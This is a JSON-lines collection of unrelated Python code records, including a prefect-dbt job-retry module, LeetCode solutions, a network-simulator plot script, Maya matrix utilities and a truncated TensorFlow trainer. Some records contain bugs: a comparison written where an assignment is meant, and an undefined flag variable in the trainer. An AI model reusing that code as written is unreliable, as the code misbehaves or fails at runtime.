freshness_in_command = (\n \"dbt source snapshot-freshness\" in command\n or \"dbt source freshness\" in command\n )\n if \"dbt docs generate\" in command and generate_docs:\n continue\n elif freshness_in_command and generate_sources:\n continue\n\n # find an executable command like `build` or `run`\n # search in a list so that there aren't false positives, like\n # `\"run\" in \"dbt run-operation\"`, which is True; we actually want\n # `\"run\" in [\"dbt\", \"run-operation\"]` which is False\n command_components = shlex.split(command)\n for exe_command in EXE_COMMANDS:\n if exe_command in command_components:\n break\n else:\n exe_command = \"\"\n\n is_exe_command = exe_command in EXE_COMMANDS\n is_not_success = status in (\"error\", \"skipped\", \"cancelled\")\n is_skipped = status == \"skipped\"\n if (not is_exe_command and is_not_success) or (\n is_exe_command and is_skipped\n ):\n # if no matches like `run-operation`, we will be rerunning entirely\n # or if it's one of the expected commands and is skipped\n steps_override.append(command)\n else:\n # errors and failures are when we need to inspect to figure\n # out the point of failure\n try:\n run_artifact = await self.get_run_artifacts(\n \"run_results.json\", run_step[\"index\"]\n )\n except JSONDecodeError:\n # get the run results scoped to the step which had an error\n # an error here indicates that either:\n # 1) the fail-fast flag was set, in which case\n # the run_results.json file was never created; or\n # 2) there was a problem on dbt Cloud's side saving\n # this artifact\n steps_override.append(command)\n else:\n # we only need to find the individual nodes\n # for those run commands\n run_results = run_artifact[\"results\"]\n modified_command = self._select_unsuccessful_commands(\n run_results=run_results,\n command_components=command_components,\n command=command,\n exe_command=exe_command,\n )\n steps_override.append(modified_command)\n\n if self._dbt_cloud_job.trigger_job_run_options is None:\n trigger_job_run_options_override = TriggerJobRunOptions(\n steps_override=steps_override\n )\n else:\n trigger_job_run_options_override = (\n self._dbt_cloud_job.trigger_job_run_options.copy()\n )\n trigger_job_run_options_override.steps_override = steps_override\n return trigger_job_run_options_override\n\n @sync_compatible\n async def retry_failed_steps(self) -> \"DbtCloudJobRun\": # noqa: F821\n \"\"\"\n Retries steps that did not complete successfully in a run.\n\n Returns:\n A representation of the dbt Cloud job run.\n \"\"\"\n job = await self._dbt_cloud_job.get_job()\n run = await self.get_run()\n\n trigger_job_run_options_override = await self._build_trigger_job_run_options(\n job=job, run=run\n )\n\n num_steps = len(trigger_job_run_options_override.steps_override)\n if num_steps == 0:\n self.logger.info(f\"{self._log_prefix} does not have any steps to retry.\")\n else:\n self.logger.info(f\"{self._log_prefix} has {num_steps} steps to retry.\")\n run = await self._dbt_cloud_job.trigger(\n trigger_job_run_options=trigger_job_run_options_override,\n )\n return run\n\n\nclass DbtCloudJob(JobBlock):\n \"\"\"\n Block that holds the information and methods to interact with a dbt Cloud job.\n\n Attributes:\n dbt_cloud_credentials: The credentials to use to authenticate with dbt Cloud.\n job_id: The id of the dbt Cloud job.\n timeout_seconds: The number of seconds to wait for the job to complete.\n interval_seconds:\n The number of seconds to wait between polling for job completion.\n trigger_job_run_options: The options to use when triggering a job run.\n\n Examples:\n Load a configured dbt Cloud job block.\n ```python\n from prefect_dbt.cloud import DbtCloudJob\n\n dbt_cloud_job = DbtCloudJob.load(\"BLOCK_NAME\")\n ```\n\n Triggers a dbt Cloud job, waits for completion, and fetches the results.\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials, DbtCloudJob\n\n @flow\n def dbt_cloud_job_flow():\n dbt_cloud_credentials = DbtCloudCredentials.load(\"dbt-token\")\n dbt_cloud_job = DbtCloudJob.load(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=154217\n )\n dbt_cloud_job_run = dbt_cloud_job.trigger()\n dbt_cloud_job_run.wait_for_completion()\n dbt_cloud_job_run.fetch_result()\n return dbt_cloud_job_run\n\n dbt_cloud_job_flow()\n ```\n \"\"\"\n\n _block_type_name = \"dbt Cloud Job\"\n _logo_url = \"https://images.ctfassets.net/gm98wzqotmnx/5zE9lxfzBHjw3tnEup4wWL/9a001902ed43a84c6c96d23b24622e19/dbt-bit_tm.png?h=250\" # noqa\n _documentation_url = \"https://prefecthq.github.io/prefect-dbt/cloud/jobs/#prefect_dbt.cloud.jobs.DbtCloudJob\" # noqa\n\n dbt_cloud_credentials: DbtCloudCredentials = Field(\n default=...,\n description=\"The dbt Cloud credentials to use to authenticate with dbt Cloud.\",\n ) # noqa: E501\n job_id: int = Field(\n default=..., description=\"The id of the dbt Cloud job.\", title=\"Job ID\"\n )\n timeout_seconds: int = Field(\n default=900,\n description=\"The number of seconds to wait for the job to complete.\",\n )\n interval_seconds: int = Field(\n default=10,\n description=\"The number of seconds to wait between polling for job completion.\",\n )\n trigger_job_run_options: TriggerJobRunOptions = Field(\n default_factory=TriggerJobRunOptions,\n description=\"The options to use when triggering a job run.\",\n )\n\n @sync_compatible\n async def get_job(self, order_by: Optional[str] = None) -> Dict[str, Any]:\n \"\"\"\n Retrieve information about a dbt Cloud job.\n\n Args:\n order_by: The field to order the results by.\n\n Returns:\n The job data.\n \"\"\"\n try:\n async with self.dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_job(\n job_id=self.job_id,\n order_by=order_by,\n )\n except HTTPStatusError as ex:\n raise DbtCloudGetJobFailed(extract_user_message(ex)) from ex\n return response.json()[\"data\"]\n\n @sync_compatible\n async def trigger(\n self, trigger_job_run_options: Optional[TriggerJobRunOptions] = None\n ) -> DbtCloudJobRun:\n \"\"\"\n Triggers a dbt Cloud job.\n\n Returns:\n A representation of the dbt Cloud job run.\n \"\"\"\n try:\n trigger_job_run_options = (\n trigger_job_run_options or self.trigger_job_run_options\n )\n async with self.dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.trigger_job_run(\n job_id=self.job_id, options=trigger_job_run_options\n )\n except HTTPStatusError as ex:\n raise DbtCloudJobRunTriggerFailed(extract_user_message(ex)) from ex\n\n run_data = response.json()[\"data\"]\n run_id = run_data.get(\"id\")\n run = DbtCloudJobRun(\n dbt_cloud_job=self,\n run_id=run_id,\n )\n self.logger.info(\n f\"dbt Cloud job {self.job_id} run {run_id} successfully triggered. \"\n f\"You can view the status of this run at \"\n f\"https://{self.dbt_cloud_credentials.domain}/#/accounts/\"\n f\"{self.dbt_cloud_credentials.account_id}/projects/\"\n f\"{run_data['project_id']}/runs/{run_id}/\"\n )\n return run\n\n\n@flow\nasync def run_dbt_cloud_job(\n dbt_cloud_job: DbtCloudJob,\n targeted_retries: int = 3,\n) -> Dict[str, Any]:\n \"\"\"\n Flow that triggers and waits for a dbt Cloud job run, retrying a\n subset of failed nodes if necessary.\n\n Args:\n dbt_cloud_job: Block that holds the information and\n methods to interact with a dbt Cloud job.\n targeted_retries: The number of times to retry failed steps.\n\n Examples:\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials, DbtCloudJob\n from prefect_dbt.cloud.jobs import run_dbt_cloud_job\n\n @flow\n def run_dbt_cloud_job_flow():\n dbt_cloud_credentials = DbtCloudCredentials.load(\"dbt-token\")\n dbt_cloud_job = DbtCloudJob(\n dbt_cloud_credentials=dbt_cloud_credentials, job_id=154217\n )\n return run_dbt_cloud_job(dbt_cloud_job=dbt_cloud_job)\n\n run_dbt_cloud_job_flow()\n ```\n \"\"\"\n logger = get_run_logger()\n\n run = await task(dbt_cloud_job.trigger.aio)(dbt_cloud_job)\n while targeted_retries > 0:\n try:\n await task(run.wait_for_completion.aio)(run)\n result = await task(run.fetch_result.aio)(run)\n return result\n except DbtCloudJobRunFailed:\n logger.info(\n f\"Retrying job run with ID: {run.run_id} \"\n f\"{targeted_retries} more times\"\n )\n run = await task(run.retry_failed_steps.aio)(run)\n targeted_retries -= 1\n","repo_name":"PrefectHQ/prefect-dbt","sub_path":"prefect_dbt/cloud/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":43411,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"16"} +{"seq_id":"22853360377","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:\n if not head: return None\n\n node = ListNode()\n start = node\n current_val = 101\n\n while head:\n if head.val != current_val:\n node.next = head\n node = node.next\n current_val = head.val\n head = head.next\n node.next = None\n\n return start.next\n","repo_name":"jinhongliu6688/leetcode-algorithms","sub_path":"83-remove-duplicates-from-sorted-list/83.py","file_name":"83.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70111962889","text":"from multiprocessing import Pool\nfrom bokeh.plotting import figure, show, output_file\nfrom bokeh.palettes import Category20 as palette\nimport itertools\nimport tqdm\nimport numpy as np\nfrom network_simulator.components import simulator\nfrom network_simulator.helpers import writeSimCache, readSimCache\n\ndef main():\n return simulator(g_init_vars, g_aplist, g_usrlist)\n\ndef loadBalancing(init_vars, aplist, usrlist):\n global g_init_vars, g_aplist, g_usrlist\n\n g_init_vars = init_vars\n g_aplist = aplist\n g_usrlist = usrlist\n \n plot_from_saved = 1\n total_runs = range(20)\n usr_limit = np.arange(30, 120, 5)\n _output = {}\n\n _sim_dict_axes = {\n \"axes1\" : {\n \"param\" : \"No Policy - Epsilon Greedy\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 5,\n \"SMART_PARAM\" : [0.01, 12]\n },\n \"axes2\" : {\n \"param\" : \"Cheapest Users - Epsilon Greedy\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 5,\n \"SMART_PARAM\" : [0.01, 12]\n },\n \"axes3\" : {\n \"param\" : \"No Policy - UCB1\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 6,\n \"SMART_PARAM\" : [0.001, 12]\n },\n \"axes4\" : {\n \"param\" : \"Cheapest Users - UCB1\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 6,\n \"SMART_PARAM\" : [0.001, 12]\n },\n \"axes5\" : {\n \"param\" : \"No Transmission Policy - Shared Evenly\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 1,\n },\n \"axes6\" : {\n \"param\" : \"Cheapest Users - Shared Evenly\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 1,\n },\n \"axes7\" : {\n \"param\" : \"No Transmission Policy - AP Energy Arrival\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 2,\n },\n \"axes8\" : {\n \"param\" : \"Cheapest Users - AP Energy Arrival\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 2,\n },\n \"axes9\" : {\n \"param\" : \"No Transmission Policy - AP Energy Use\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 3,\n },\n \"axes10\" : {\n \"param\" : \"Cheapest Users - AP Energy Use\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 3,\n },\n \"axes11\" : {\n \"param\" : \"No Transmission Policy - AP Energy Efficiency\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 4,\n },\n \"axes12\" : {\n \"param\" : \"Cheapest Users - AP Energy Efficiency\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 4,\n }\n }\n\n if plot_from_saved == 0:\n\n bar = tqdm.tqdm(desc=\"Load Balancing\", total=len(_sim_dict_axes.keys()) * len(usr_limit))\n\n init_vars[\"LOAD_BALANCE\"] = 0\n\n # Run once for no Load Balancing\n for axes in _sim_dict_axes.values():\n\n for param in [\"ENERGY_POLICY\", \"SHARE_ENERGY\"]:\n init_vars[param] = axes[param]\n\n if init_vars[\"SHARE_ENERGY\"] == 6 or init_vars[\"SHARE_ENERGY\"] == 5:\n init_vars[\"SMART_PARAM\"] == axes[\"SMART_PARAM\"]\n\n _avg_serviced_users = []\n\n pool = Pool(10)\n\n _serviced_users = [pool.apply_async(main, ()) for run in total_runs]\n\n _avg_serviced_users = sum([result.get() for result in _serviced_users]) / len(total_runs)\n _output[axes[\"param\"] + \" No Balancing\"] = { \"result\" : [_avg_serviced_users]*len(usr_limit) }\n bar.update(1)\n init_vars[\"LOAD_BALANCE\"] = 1\n\n for axes in _sim_dict_axes.values():\n \n for param in [\"ENERGY_POLICY\", \"SHARE_ENERGY\"]:\n init_vars[param] = axes[param]\n\n _avg_serviced_users = []\n\n for num in usr_limit:\n init_vars[\"USR_LIMIT\"] = num\n\n pool = Pool(10)\n\n _serviced_users = [pool.apply_async(main, ()) for run in total_runs]\n\n _avg_serviced_users.append(sum([result.get() for result in _serviced_users]) / len(total_runs))\n\n _output[axes[\"param\"]] = { \"result\" : _avg_serviced_users }\n bar.update(1)\n bar.close()\n writeSimCache(\"LoadBalanceM\", _output)\n else:\n _output = readSimCache(\"LoadBalanceM\")\n\n output_file(\"interactive/loadbalancing.html\")\n\n TOOLTIPS = [\n (\"(x, y)\", \"($x, $y)\"),\n (\"desc\", \"$name\")\n ]\n \n # Plot colours\n colors = itertools.cycle(palette[12])\n\n p = figure(width=1200, height=800, x_axis_label='Total Number of Users', y_axis_label='Total Number of Serviced Users', tooltips=TOOLTIPS, output_backend='svg')\n count = 0\n\n for key, value in _output.items():\n\n count += 1\n\n print(key + \" : \" + str(sum(value[\"result\"])/len(value[\"result\"])))\n if count >= 13:\n p.line(usr_limit, value[\"result\"], legend_label=key, name=key, color=next(colors), line_width=3, line_dash=\"dashed\")\n else:\n p.line(usr_limit, value[\"result\"], legend_label=key, name=key, color=next(colors), line_width=3)\n\n # p.legend[0].orientation = \"vertical\"\n # legend_ref = p.legend[0] \n # p.legend[0] = None\n p.xaxis.axis_label_text_font_size='20px'\n p.xaxis.major_label_text_font_size='20px'\n p.yaxis.axis_label_text_font_size='20px'\n p.yaxis.major_label_text_font_size='20px'\n p.legend.label_text_font_size='18px' \n p.legend[0].orientation = \"vertical\"\n legend_ref = p.legend[0] \n p.add_layout(legend_ref, \"right\")\n\n show(p)\n p.toolbar.logo = None\n p.toolbar_location = None\n\n return p\n","repo_name":"brokenax3/network-simulator-py","sub_path":"network_simulator/test/testLoadBalancing.py","file_name":"testLoadBalancing.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5109407618","text":"# key: memorize the all the stop points\n# time complexity: O(M*N)\n# space complexity: O(M*N)\nimport collections\n\n\nclass Solution(object):\n def hasPath(self, maze, start, destination):\n \"\"\"\n :type maze: List[List[int]]\n :type start: List[int]\n :type destination: List[int]\n :rtype: bool\n \"\"\"\n\n queue = collections.deque([])\n m, n, = len(maze), len(maze[0])\n\n def isWall(pos):\n i, j = pos\n if 0 <= i < m and 0 <= j < n:\n return maze[i][j] == 1\n return True\n\n def bounce(pos):\n i, j = pos\n return list(filter(lambda item: not isWall(item[0]), [[(i-1, j), (-1, 0)], [(i+1, j), (1, 0)], [(i, j-1), (0, -1)], [(i, j+1), (0, 1)]]))\n\n def move(p, d): return (p[0]+d[0], p[1]+d[1])\n visited = {}\n\n queue.extend(bounce(start))\n while queue:\n pos, direct = queue.popleft()\n nxt = move(pos, direct)\n while not isWall(nxt):\n pos = nxt\n nxt = move(nxt, direct)\n\n if tuple(destination) == pos:\n return True\n if visited.get(pos, False):\n continue\n visited[pos] = True\n queue.extend(bounce(pos))\n return False\n","repo_name":"simonzg/leetcode-solutions","sub_path":"490.The_Maze.py","file_name":"490.The_Maze.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2864021672","text":"# -*- coding: utf-8 -*-\n\"\"\"============================================================================\nModule descriptions.\n\n\n__AUTHOR__ = 'minsung'\n__UPDATE__ = 20210707\n\n:Example:\nfrom lib.m_lib import NurbsCurveNode\nreload(NurbsCurveNode)\n\nblah blah blah blah blah blah\nblah blah blah blah blah blah\n============================================================================\"\"\"\n#\n# when start coding 3 empty lines.\n#\nimport math\nfrom pymel import util\nfrom pymel.core import *\nimport maya.OpenMaya as om\nimport pymel.core.datatypes as dt\n\ndef hierarchy_(object_):\n for i,obj in enumerate(object_):\n if i>0:\n parent(obj, object_[i-1])\n\ndef getChildren_(object_, type_=None):\n \"\"\"Get the childrens from top object\n\n Arguments:\n object_ (node): transform node\n type_ (type): node type\n\n Returns:\n list : childrens list\n\n \"\"\"\n object_ = PyNode(object_)\n if not type_:\n type_ = 'transform'\n child_ = object_.listRelatives(ad=1, c=1, typ=type_)\n child_ = child_ + [object_]\n child_.reverse()\n return child_\n\ndef divide_in_two(object_):\n divideNum = int(len(object_)/2)\n items = object_[:divideNum]\n targets = object_[divideNum:]\n return items, targets\n\ndef get_transform(object_):\n _name = object_.name()\n trans = xform(_name, q=1, ws=1, rp=1 )\n rot = xform(_name, q=1, ws=1, ro=1 )\n return trans, rot\n\ndef getTransform(object_):\n return object_.getMatrix(worldSpace=True)\n\ndef set_trans_xform(object_, trans):\n xform(object_, r = 1, t = trans)\n\ndef set_rot_xform(object_, rot):\n xform(object_, r = 1, ro = rot)\n\ndef get_trans(object_):\n return object_.getMatrix(worldSpace=True)[-1][:-1]\n \ndef get_rot(object_):\n return xform(object_, q=1, ws=1, ro=1 )\n\ndef set_transform_(object_):\n items, targets = divide_in_two(object_)\n for i,item in enumerate(items):\n pos, rot = get_transform(item)\n set_trans_xform(targets[i], pos)\n set_rot_xform(targets[i], rot)\n\ndef getInverseTransform(object_):\n \"\"\"Get the object_ from inverse matrix\n\n Arguments:\n object_ (node): transform node\n\n Returns:\n matrix : inverse matrix\n\n \"\"\"\n return object_.getMatrix(worldSpace=True).inverse()\n\ndef getMultMatrix(mat1, mat2):\n \"\"\"Get the matrix from multiply\n\n Arguments:\n mat1 (matrix): The first input Matrix.\n mat2 (matrix): The second input Matrix.\n\n Returns:\n matrix : mult matrix\n\n \"\"\"\n return mat1*mat2\n\ndef matrixList_(matrix_):\n \"\"\"Get the list from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n\n Returns:\n list : matrix array list\n\n \"\"\"\n list_=[]\n array_ = matrix_.get()\n for i,a in enumerate(array_):\n for j in a:\n list_.append(j)\n return list_\n\ndef setMatrixAxis_(matrix_, axis_):\n \"\"\"Get the FlipAxis from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): flip axis\n\n Returns:\n matrix : fliped matrix\n\n \"\"\"\n flipMatrix = dt.Matrix()\n \n if axis_ == 'x':\n matrix_value=[-1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1]\n \n elif axis_ == 'y':\n matrix_value=[1, 0, 0, 0, 0, -1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1]\n \n elif axis_ == 'z':\n matrix_value=[1, 0, 0, 0, 0, 1, 0, 0, 0, 0, -1, 0, 0, 0, 0, 1]\n \n \n if matrix_value:\n om.MScriptUtil.createMatrixFromList(matrix_value, flipMatrix)\n \n return matrix_*flipMatrix\n\ndef setMatrixPos(matrix_, axis_):\n \"\"\"Get the FlipAxis from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): flip axis\n\n Returns:\n matrix : fliped matrix\n\n \"\"\"\n data_=matrixList_(matrix_)\n\n if axis_ == 'x':\n data_[12] *= -1.0\n\n elif axis_ == 'y':\n data_[13] *= -1.0\n\n elif axis_ == 'z':\n data_[14] *= -1.0\n\n om.MScriptUtil.createMatrixFromList(data_, matrix_)\n\n return matrix_\n \ndef setMatrixRot_(matrix_, axis_):\n \"\"\"Get the FlipRotate from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): flip axis\n\n Returns:\n matrix : fliped matrix\n\n \"\"\"\n data_ = matrixList_(matrix_)\n if axis_ == 'x':\n data_[0] *= -1.0\n data_[1] *= -1.0\n data_[2] *= -1.0\n\n elif axis_ == 'y':\n data_[4] *= -1.0\n data_[5] *= -1.0\n data_[6] *= -1.0\n\n elif axis_ == 'z':\n data_[8] *= -1.0\n data_[9] *= -1.0\n data_[10] *= -1.0\n\n om.MScriptUtil.createMatrixFromList(data_, matrix_)\n\n return matrix_\n\ndef setMatrixFromList(list_):\n\n matrix_ = dt.Matrix()\n data_ = matrixList_(matrix_)\n data_[0] = list_[0]\n data_[1] = list_[1]\n data_[2] = list_[2]\n data_[4] = list_[3]\n data_[5] = list_[4]\n data_[6] = list_[5]\n data_[8] = list_[6]\n data_[9] = list_[7]\n data_[10] = list_[8]\n data_[12] = list_[9]\n data_[13] = list_[10]\n data_[14] = list_[11]\n\n om.MScriptUtil.createMatrixFromList(data_, matrix_)\n\n return matrix_\n\ndef mirrorMatrix_(matrix_, axis_=None, type_=None):\n \"\"\"Get the mirror matrix from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): 'x', 'y', 'z'\n type_ (mirror type): 'flip', 'rot', 'pos'\n\n Returns:\n matrix : mirror matrix\n\n \"\"\"\n if type_ == 'flip':\n getMatrix_ = setMatrixAxis_(matrix_, axis_)\n if type_ == 'rot':\n getMatrix_ = setMatrixRot_(matrix_, axis_)\n if type_ == 'pos':\n getMatrix_ = setMatrixPos(matrix_, axis_)\n return getMatrix_\n\n\ndef mirror_(items, targets, axis='xy'):\n \"\"\"Mirror the transform by selecting the top item and top target\n\n Arguments:\n axis_ (axis): 'xy', 'xz', 'yx', 'yz', 'zx', 'zy'\n\n Returns:\n matrix : transform mirror\n\n \"\"\"\n if axis == 'xy':\n pAxis_ = 'x'\n rAxis_ = 'x'\n r2Axis_ = 'y'\n \n elif axis == 'xz':\n pAxis_ = 'x'\n rAxis_ = 'x'\n r2Axis_ = 'z'\n elif axis == 'yx':\n pAxis_ = 'y'\n rAxis_ = 'y'\n r2Axis_ = 'x'\n \n elif axis == 'yz':\n pAxis_ = 'y'\n rAxis_ = 'y'\n r2Axis_ = 'z'\n \n elif axis == 'zx':\n pAxis_ = 'z'\n rAxis_ = 'z'\n r2Axis_ = 'x'\n \n elif axis == 'zy':\n pAxis_ = 'z'\n rAxis_ = 'z'\n r2Axis_ = 'y'\n \n for i,item in enumerate(items): \n matrix_ = item.getMatrix(worldSpace=True)\n \n matrix_ = mirrorMatrix_(matrix_, axis_=pAxis_, type_='flip')\n if i>0:\n PInvMatrix_ = getInverseTransform(targets[i].getParent())\n matrix_ = getMultMatrix(matrix_, PInvMatrix_)\n targets[i].setMatrix(matrix_)\n \n localmatrix_ = targets[i].getMatrix(worldSpace=True)\n \n matrix_ = mirrorMatrix_(localmatrix_, axis_=rAxis_, type_='rot')\n if i>0:\n matrix_ = getMultMatrix(matrix_, PInvMatrix_)\n targets[i].setMatrix(matrix_)\n \n matrix_ = mirrorMatrix_(localmatrix_, axis_=r2Axis_, type_='rot')\n if i>0:\n matrix_ = getMultMatrix(matrix_, PInvMatrix_)\n targets[i].setMatrix(matrix_)\n makeIdentity(targets[i], apply=1, t=0, r=1, s=1, n=0, pn=1)\n\ndef getLocalTrans(object_):\n items, targets = divide_in_two(object_)\n for i,item in enumerate(items):\n wm_ = item.getMatrix(worldSpace=True)\n targetParent_ = targets[i].getParent()\n wim_ = targetParent_.getMatrix(worldSpace=True).inverse()\n multM_ = wm_*wim_\n getLocalTrans_ = multM_[-1][:-1]\n return getLocalTrans_.get()\n\ndef getTransformLookingAt(pos, lookat, normal, axis=\"xy\", negate=False):\n \"\"\"Return a transformation mstrix using vector positions.\n Return the transformation matrix of the dagNode oriented looking to\n an specific point.\n Arguments:\n pos (vector): The position for the transformation\n lookat (vector): The aiming position to stablish the orientation\n normal (vector): The normal control the transformation roll.\n axis (str): The 2 axis used for lookat and normal. Default \"xy\"\n negate (bool): If true, invert the aiming direction.\n Returns:\n matrix: The transformation matrix\n >>> t = tra.getTransformLookingAt(self.guide.pos[\"heel\"],\n self.guide.apos[-4],\n self.normal,\n \"xz\",\n self.negate)\n \"\"\"\n normal.normalize()\n\n if negate:\n a = pos - lookat\n else:\n a = lookat - pos\n\n a.normalize()\n c = util.cross(a, normal)\n c.normalize()\n b = util.cross(c, a)\n b.normalize()\n\n if axis == \"xy\":\n X = a\n Y = b\n Z = c\n elif axis == \"xz\":\n X = a\n Z = b\n Y = -c\n elif axis == \"yx\":\n Y = a\n X = b\n Z = -c\n elif axis == \"yz\":\n Y = a\n Z = b\n X = c\n elif axis == \"zx\":\n Z = a\n X = b\n Y = c\n elif axis == \"z-x\":\n Z = a\n X = -b\n Y = -c\n elif axis == \"zy\":\n Z = a\n Y = b\n X = -c\n\n elif axis == \"x-y\":\n X = a\n Y = -b\n Z = -c\n elif axis == \"-xz\":\n X = -a\n Z = b\n Y = c\n elif axis == \"-xy\":\n X = -a\n Y = b\n Z = c\n\n m = dt.Matrix()\n m[0] = [X[0], X[1], X[2], 0.0]\n m[1] = [Y[0], Y[1], Y[2], 0.0]\n m[2] = [Z[0], Z[1], Z[2], 0.0]\n m[3] = [pos[0], pos[1], pos[2], 1.0]\n\n return m","repo_name":"smsyes/pythonWorkSpace","sub_path":"main/mApplication/ms_module/maya/python3/rigSupport/lib/_transform.py","file_name":"_transform.py","file_ext":"py","file_size_in_byte":9608,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"42196857355","text":"import time\n\nimport tensorflow as tf\n\nfrom models.alexnet import AlexNet\nfrom models.vgg import VGG\nfrom models.googlenet import GoogLeNet\nfrom models.resnet import ResNet\nfrom models.inception_v2 import InceptionV2\nfrom models.inception_v3 import InceptionV3\nfrom trainers.predefined_loss import *\n\nclass ClfTrainer:\n def __init__(self, clf_model, clf_dataset):\n self.clf_model = clf_model\n self.clf_dataset = clf_dataset\n\n def __run_train__(self, sess, input, output,\n batch_i, batch_size,\n cost_func, train_op,\n scale_to_imagenet=False):\n\n total_loss = 0\n count = 0\n\n for batch_features, batch_labels in self.clf_dataset.get_training_batches_from_preprocessed(batch_i, batch_size, scale_to_imagenet):\n loss, _ = sess.run([cost_func, train_op],\n feed_dict={input: batch_features,\n output: batch_labels})\n total_loss = total_loss + loss\n count = count + 1\n\n return total_loss/count\n\n def __run_accuracy_in_valid_set__(self, sess, input, output, accuracy, batch_size, scale_to_imagenet=False):\n valid_features, valid_labels = self.clf_dataset.get_valid_set(scale_to_imagenet)\n\n valid_acc = 0\n for batch_valid_features, batch_valid_labels in self.clf_dataset.get_batches_from(valid_features, valid_labels, batch_size):\n valid_acc += sess.run(accuracy,\n feed_dict={input:batch_valid_features,\n output:batch_valid_labels})\n\n tmp_num = valid_features.shape[0]/batch_size\n return valid_acc/tmp_num\n\n def __train__(self, input, output,\n cost_func, train_op, accuracy,\n epochs, batch_size, save_model_path,\n save_every_epoch=1):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n print('starting training ... ')\n for epoch in range(epochs):\n n_batches = self.clf_dataset.num_batch\n\n for batch_i in range(1, n_batches + 1):\n loss = self.__run_train__(sess,\n input, output,\n batch_i, batch_size,\n cost_func, train_op,\n self.clf_model.scale_to_imagenet)\n print('Epoch {:>2}, {} Batch {}: '.format(epoch + 1, self.clf_dataset.name, batch_i), end='')\n print('Avg. Loss: {} '.format(loss), end='')\n\n valid_acc = self.__run_accuracy_in_valid_set__(sess,\n input, output,\n accuracy, batch_size,\n self.clf_model.scale_to_imagenet)\n print('Validation Accuracy {:.6f}'.format(valid_acc))\n\n if epoch % save_every_epoch == 0:\n print('epoch: {} is saved...'.format(epoch+1))\n saver = tf.train.Saver()\n saver.save(sess, save_model_path, global_step=epoch+1, write_meta_graph=False)\n\n def __get_simple_losses_and_accuracy__(self, out_layers, output, learning_rate, options=None):\n is_loss_weights_considered = False\n label_smoothings = [0 for i in range(len(out_layers))]\n\n if options is not None:\n if 'loss_weights' in options and \\\n len(options['loss_weights']) is len(out_layers):\n is_loss_weights_considered = True\n\n if 'label_smoothings' in options and \\\n len(options['label_smoothings']) is len(out_layers):\n label_smoothings = options['label_smoothings']\n\n aux_cost_sum = 0\n if is_loss_weights_considered:\n for i in range(len(out_layers) - 1):\n aux_out_layer = out_layers[i]\n aux_label_smoothing = label_smoothings[i]\n aux_cost = tf.losses.softmax_cross_entropy(output, aux_out_layer, label_smoothing=aux_label_smoothing, reduction=tf.losses.Reduction.MEAN)\n aux_cost_sum += aux_cost * options['loss_weights'][i]\n\n final_out_layer = out_layers[len(out_layers)-1]\n final_label_smoothing = label_smoothings[len(out_layers)-1]\n cost = tf.losses.softmax_cross_entropy(output, final_out_layer, label_smoothing=final_label_smoothing, reduction=tf.losses.Reduction.MEAN)\n\n if is_loss_weights_considered:\n cost = cost * options['loss_weights'][len(out_layers)-1]\n\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n gradients = optimizer.compute_gradients(cost+aux_cost_sum)\n train_op = optimizer.apply_gradients(gradients)\n\n correct_pred = tf.equal(tf.argmax(final_out_layer, 1), tf.argmax(output, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n return cost, train_op, accuracy\n\n def __get_losses_and_accuracy__(self, model, output, out_layers, learning_rate, options=None):\n from_paper_flag = True\n\n if options is None or options['optimizer_from_paper'] is False:\n optimizer_from_paper_flag = False\n\n if isinstance(model, AlexNet):\n return get_alexnet_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, None)\n elif isinstance(model, VGG):\n return get_vgg_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, None)\n elif isinstance(model, GoogLeNet):\n return get_googlenet_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, 